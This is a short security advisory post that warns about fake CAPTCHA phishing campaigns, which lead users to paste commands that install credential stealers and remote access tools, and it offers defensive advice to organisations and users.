Security teams are reporting an increase in phishing campaigns that mimic legitimate CAPTCHA challenges but include hidden steps that lead users to download and execute malware.
These fake CAPTCHAs often appear on compromised legitimate sites, in malvertising, or via phishing links; once followed they can install credential-stealers, remote access tools, and other payloads that capture browser data and passwords.
Higher-education institutions have already seen incidents: UCL’s ISG investigated cases in 2025 where users visiting trusted sites were prompted to complete a deceptive CAPTCHA process and inadvertently ran malicious commands.
Practical steps for organisations and users:
• Do not follow website instructions that require you to complete verification steps outside the browser or paste terminal/Run commands into your device.
• Ensure modern endpoint protection is deployed and kept up to date to detect and block execution of malicious code.
• Treat unexpected captcha prompts on otherwise trusted sites as suspicious—report and escalate to security teams so the hosting site can be checked for compromise.
These campaigns exploit user familiarity with CAPTCHAs to bypass basic scepticism; visibility, monitoring, and simple user guidance remain effective first lines of defence.
Top comments (0)